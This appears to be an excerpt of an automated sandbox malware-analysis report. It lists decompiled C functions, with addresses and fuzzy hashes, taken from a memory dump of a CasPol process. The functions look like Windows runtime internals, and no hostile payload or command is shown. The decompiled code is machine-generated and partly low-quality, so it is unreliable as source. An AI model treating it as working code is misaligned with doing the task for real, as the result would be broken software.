                                                                  0x0146a423
                                                                  0x0146a423
                                                                  0x0146a415
                                                                  0x0142b3d1
                                                                  0x0142b3e8
                                                                  0x0142b3e8
                                                                  0x0142b3d9

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b98abe779d87b058a1701ff3b1c1db71b400d9f3f8a5485a4a9a374ba07ae12
                                                                  • Instruction ID: e0a96bca3a660650f791d73e320b2c758d1190017884981bf62bd99ab8f6fba4
                                                                  • Opcode Fuzzy Hash: 5b98abe779d87b058a1701ff3b1c1db71b400d9f3f8a5485a4a9a374ba07ae12
                                                                  • Instruction Fuzzy Hash: D31148333011219BCB2A8A298D81A6B739AEBD5230B34412FDD16D73B0CA71AC42C695
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013F9240 Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 77%
                                                                  			E013F9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x14cf708);
				E0144D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E014395D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E014395D0();
				_t33 =  *0x14e84c4; // 0x0
				L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x14e84c4; // 0x0
				L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x14e84c4; // 0x0
				E01412280(L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x14e86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E014395D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E014395D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E013F9325();
					_t50 =  *0x14e84c4; // 0x0
					return E0144D0D1(L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                  0x013f9240
                                                                  0x013f9242
                                                                  0x013f9247
                                                                  0x013f924c
                                                                  0x013f924e
                                                                  0x013f9255
                                                                  0x013f9257
                                                                  0x013f925a
                                                                  0x013f925f
                                                                  0x013f925f
                                                                  0x013f9266
                                                                  0x013f9271
                                                                  0x013f9276
                                                                  0x013f9279
                                                                  0x013f927e
                                                                  0x013f9295
                                                                  0x013f929a
                                                                  0x013f92b1
                                                                  0x013f92b6
                                                                  0x013f92d7
                                                                  0x013f92dc
                                                                  0x013f92e0
                                                                  0x013f92e6
                                                                  0x013f92e8
                                                                  0x013f92ee
                                                                  0x013f9332
                                                                  0x013f9333
                                                                  0x013f9337
                                                                  0x013f9338
                                                                  0x013f933a
                                                                  0x013f933a
                                                                  0x013f933d
                                                                  0x013f9342
                                                                  0x013f9342
                                                                  0x013f9345
                                                                  0x013f9349
                                                                  0x013f934e
                                                                  0x013f9352
                                                                  0x013f9357
                                                                  0x013f92f4
                                                                  0x013f92f4
                                                                  0x013f92f6
                                                                  0x013f92f9
                                                                  0x013f9300
                                                                  0x013f9306
                                                                  0x013f9324
                                                                  0x013f9324

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 163fa4f7a9ffa117d98950af399857fd1f83d069cf6a211b13c0898b491e3646
                                                                  • Instruction ID: 59874f404da3e11ce18a95bf2d7b1fef2738fdb3f68e608325ccdefef8d4206f
                                                                  • Opcode Fuzzy Hash: 163fa4f7a9ffa117d98950af399857fd1f83d069cf6a211b13c0898b491e3646
                                                                  • Instruction Fuzzy Hash: 06212872041602DFC722EF69CA40F59B7F9FF28708F1445AEA1598B6B2DB35E941CB44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01484257 Relevance: .1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 90%
                                                                  			E01484257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x14d08d0);
				E0144D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E014841E8(__ebx, __edi, __ecx, _t39);
				L0140EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x14e87e4;
					_t18 =  *0x14e87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x14e5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x14e87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x14e87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L013F7055(_t31 + 0xfffffff8);
								_t24 =  *0x14e87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x14e87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x14e5cd0;
				if( *0x14e5cd0 <= 0) {
					L013F7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x14e87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x14e87e8 = _t30;
						 *0x14e87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0144D0D1(L01484320());
			}















                                                                  0x01484257
                                                                  0x01484257
                                                                  0x01484257
                                                                  0x01484259
                                                                  0x0148425e
                                                                  0x01484263
                                                                  0x01484265
                                                                  0x01484273
                                                                  0x01484278
                                                                  0x0148427c
                                                                  0x0148427f
                                                                  0x01484281
                                                                  0x01484287
                                                                  0x014842d7
                                                                  0x014842d7
                                                                  0x014842da
                                                                  0x0148428d
                                                                  0x0148428d
                                                                  0x0148428f
                                                                  0x01484292
                                                                  0x01484297
                                                                  0x0148429c
                                                                  0x014842a0
                                                                  0x014842a6
                                                                  0x014842a8
                                                                  0x014842ae
                                                                  0x014842b3
                                                                  0x00000000
                                                                  0x014842ba
                                                                  0x014842ba
                                                                  0x014842bf
                                                                  0x014842c5
                                                                  0x014842ca
                                                                  0x014842cf
                                                                  0x014842d0
                                                                  0x00000000
                                                                  0x014842d0
                                                                  0x014842b3
                                                                  0x00000000
                                                                  0x014842a6
                                                                  0x0148429c
                                                                  0x014842dc
                                                                  0x014842dc
                                                                  0x014842e3
                                                                  0x01484309
                                                                  0x014842e5
                                                                  0x014842e5
                                                                  0x014842e8
                                                                  0x014842ee
                                                                  0x014842f0
                                                                  0x00000000
                                                                  0x014842f2
                                                                  0x014842f2
                                                                  0x014842f4
                                                                  0x014842f7
                                                                  0x014842f9
                                                                  0x01484300
                                                                  0x01484300
                                                                  0x014842f0
                                                                  0x0148430e
                                                                  0x0148431f

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6b502a4b8bec3fc9084adf3a56ccff52459d5ab447c38e7d06d801ad7b466de5
                                                                  • Instruction ID: d8f80332b8b9869bada69266722f5c0cd674c89d74de11e7cf643d3326648fe1
                                                                  • Opcode Fuzzy Hash: 6b502a4b8bec3fc9084adf3a56ccff52459d5ab447c38e7d06d801ad7b466de5
                                                                  • Instruction Fuzzy Hash: 20215874A40607CFCB25EF69D500B19BBE1FB95398B28826FD1058F3BADB319491CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01422397 Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 25%
                                                                  			E01422397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x14e848c != 0) {
					L0141FAD0(0x14e8610);
					if( *0x14e848c == 0) {
						E0141FA00(0x14e8610, _t19, _t27, 0x14e8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = L01422581(0x14e8610, 0x13d50a0, _t26, _t27, _t28);
						E0141FA00(0x14e8610, 0x13d50a0, _t27, 0x14e8610);
					}
				} else {
					L1:
					_t11 =  *0x14e8614; // 0x0
					if(_t11 == 0) {
						_t11 = E01434886(0x13d1088, 1, 0x14e8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = L01422581(0x14e8610, (_t11 << 4) + 0x13d5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                  0x014223b0
                                                                  0x014223b6
                                                                  0x01422409
                                                                  0x01422415
                                                                  0x01465ae9
                                                                  0x00000000
                                                                  0x0142241b
                                                                  0x0142241b
                                                                  0x0142241d
                                                                  0x01422427
                                                                  0x0142242e
                                                                  0x01422430
                                                                  0x01422430
                                                                  0x014223b8
                                                                  0x014223b8
                                                                  0x014223b8
                                                                  0x014223bf
                                                                  0x014223fc
                                                                  0x014223fc
                                                                  0x014223c1
                                                                  0x014223c3
                                                                  0x014223d0
                                                                  0x014223d8
                                                                  0x014223d8
                                                                  0x014223dc
                                                                  0x014223de
                                                                  0x014223e1
                                                                  0x014223e1
                                                                  0x014223ec

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7c34901056f31433e12fbc4e48a9ddc894700daea856dacb55031c54a8defabb
                                                                  • Instruction ID: 50675a7faf466caf8fd434145954580177961da168b493627903a0999fd5aa7b
                                                                  • Opcode Fuzzy Hash: 7c34901056f31433e12fbc4e48a9ddc894700daea856dacb55031c54a8defabb
                                                                  • Instruction Fuzzy Hash: 3E112B3274431267EB30AA3AAC40F16B6D8FB70651F54852FF60ADB271D6F4D889C754
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013FC962 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 42%
                                                                  			E013FC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x14ed360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					L0140EEF0(0x14e70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(L0147F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0140EB70(_t29, 0x14e70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return L0143B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0147F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x14e70c0; // 0x0
					while(_t38 != 0x14e70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x14eb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                  0x013fc96a
                                                                  0x013fc974
                                                                  0x013fc988
                                                                  0x013fc98a
                                                                  0x01467c9d
                                                                  0x01467c9f
                                                                  0x01467ca4
                                                                  0x01467cae
                                                                  0x01467cf0
                                                                  0x01467cf5
                                                                  0x01467cfa
                                                                  0x013fc992
                                                                  0x013fc996
                                                                  0x013fc997
                                                                  0x013fc998
                                                                  0x013fc9a3
                                                                  0x013fc9a3
                                                                  0x01467cb0
                                                                  0x01467cb7
                                                                  0x01467cbb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01467cbd
                                                                  0x01467ce8
                                                                  0x01467cc5
                                                                  0x01467cc8
                                                                  0x01467cca
                                                                  0x01467cd0
                                                                  0x01467cd6
                                                                  0x01467cde
                                                                  0x01467ce4
                                                                  0x01467ce4
                                                                  0x01467cd0
                                                                  0x00000000
                                                                  0x01467ce8
                                                                  0x013fc990
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 886ae8aa4f50730714a237eee0883f3853dc0de0a5e0eefa9fae5ba8dd7ba574
                                                                  • Instruction ID: 5f9913fd39d658e3c08210dd9a349bf65a3769d741dc53e1621ecf7cee2f0e18
                                                                  • Opcode Fuzzy Hash: 886ae8aa4f50730714a237eee0883f3853dc0de0a5e0eefa9fae5ba8dd7ba574
                                                                  • Instruction Fuzzy Hash: 251125313006069BC711AF2EDC44A2BBBE9FF9422AB10053EE94587676DB30ED10C7D2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0142002D Relevance: .1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0142002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01417D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01417D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01417D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01417D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                  0x01420032
                                                                  0x01420037
                                                                  0x01420043
                                                                  0x01464b3a
                                                                  0x01420049
                                                                  0x01420049
                                                                  0x01420049
                                                                  0x0142004e
                                                                  0x01420053
                                                                  0x01464b48
                                                                  0x01464b5a
                                                                  0x01464b4a
                                                                  0x01464b53
                                                                  0x01464b53
                                                                  0x01464b5f
                                                                  0x00000000
                                                                  0x01464b61
                                                                  0x00000000
                                                                  0x01464b61
                                                                  0x01420059
                                                                  0x01420059
                                                                  0x01420060
                                                                  0x01464b6f
                                                                  0x01464b6f
                                                                  0x01420069
                                                                  0x01464b83
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01464b90
                                                                  0x01464b9b
                                                                  0x01464b9b
                                                                  0x01464ba4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01464baa
                                                                  0x00000000
                                                                  0x0142006f
                                                                  0x0142006f
                                                                  0x00000000
                                                                  0x0142006f
                                                                  0x01420069

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                  • Instruction ID: 701b81856938e58603c76defffa30d3e9b36c0faee6fab5c1f69f6ced92d955f
                                                                  • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                  • Instruction Fuzzy Hash: 4B11E5726016918FEB238B2DD544B363BE8EB41B58F0D00A2ED04977B2D33CC882C661
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013F9080 Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 69%
                                                                  			E013F9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x14e85ec;
				E01412280(_t48, 0x14e85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return L0140FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x14e538c; // 0x77e46828
					if( *_t84 != 0x14e5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x14cf6e8);
						E0144D0E8(0x14e85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E014C88F5(_t80, _t85, 0x14e5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x14e86c0; // 0xf907b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x14e86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01412280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E014C88F5(0x14e85ec, _t85, 0x14e5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												L0143AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x14eb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x14e84c0;
																			if(_t82 >=  *0x14e84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E014C9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E013F922A(_t99);
										_t64 = E01417D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E014C8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x14e86c0; // 0xf907b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x14e86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x14e86bc;
													_t87 = 0x14e86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E013F9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x14e86c4;
												_t87 = 0x14e86c0;
												L27:
												E01429B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0144D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x14e5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x14e538c = _t51;
						goto L6;
					}
				}
			}




















                                                                  0x013f9082
                                                                  0x013f9083
                                                                  0x013f9084
                                                                  0x013f9085
                                                                  0x013f9087
                                                                  0x013f9096
                                                                  0x013f9098
                                                                  0x013f9098
                                                                  0x013f909e
                                                                  0x013f90a8
                                                                  0x013f90e7
                                                                  0x013f90e7
                                                                  0x013f90aa
                                                                  0x013f90b0
                                                                  0x013f90b7
                                                                  0x013f90bd
                                                                  0x013f90dd
                                                                  0x013f90e6
                                                                  0x013f90bf
                                                                  0x013f90bf
                                                                  0x013f90c7
                                                                  0x013f90cf
                                                                  0x013f90f1
                                                                  0x013f90f2
                                                                  0x013f90f4
                                                                  0x013f90f5
                                                                  0x013f90f6
                                                                  0x013f90f7
                                                                  0x013f90f8
                                                                  0x013f90f9
                                                                  0x013f90fa
                                                                  0x013f90fb
                                                                  0x013f90fc
                                                                  0x013f90fd
                                                                  0x013f90fe
                                                                  0x013f90ff
                                                                  0x013f9100
                                                                  0x013f9102
                                                                  0x013f9107
                                                                  0x013f910c
                                                                  0x013f9110
                                                                  0x013f9113
                                                                  0x013f9115
                                                                  0x013f9136
                                                                  0x013f913f
                                                                  0x013f9143
                                                                  0x014537e4
                                                                  0x014537e4
                                                                  0x013f9117
                                                                  0x013f9117
                                                                  0x013f911d
                                                                  0x00000000
                                                                  0x013f911f
                                                                  0x013f911f
                                                                  0x013f9125
                                                                  0x00000000
                                                                  0x013f9127
                                                                  0x013f912d
                                                                  0x013f9130
                                                                  0x013f9134
                                                                  0x013f9158
                                                                  0x013f915d
                                                                  0x013f9161
                                                                  0x013f9168
                                                                  0x01453715
                                                                  0x013f916e
                                                                  0x013f916e
                                                                  0x013f9175
                                                                  0x013f9177
                                                                  0x013f917e
                                                                  0x013f917f
                                                                  0x013f9182
                                                                  0x013f9182
                                                                  0x013f9187
                                                                  0x013f9187
                                                                  0x013f918a
                                                                  0x013f918d
                                                                  0x013f918f
                                                                  0x013f9192
                                                                  0x013f9195
                                                                  0x013f9198
                                                                  0x013f9198
                                                                  0x013f9198
                                                                  0x013f919a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0145371f
                                                                  0x01453721
                                                                  0x01453727
                                                                  0x0145372f
                                                                  0x01453733
                                                                  0x01453735
                                                                  0x01453738
                                                                  0x0145373b
                                                                  0x0145373d
                                                                  0x01453740
                                                                  0x00000000
                                                                  0x01453746
                                                                  0x01453746
                                                                  0x01453749
                                                                  0x00000000
                                                                  0x0145374f
                                                                  0x0145374f
                                                                  0x01453751
                                                                  0x01453757
                                                                  0x01453759
                                                                  0x0145375c
                                                                  0x0145375c
                                                                  0x0145375e
                                                                  0x0145375e
                                                                  0x01453761
                                                                  0x01453764
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01453766
                                                                  0x01453768
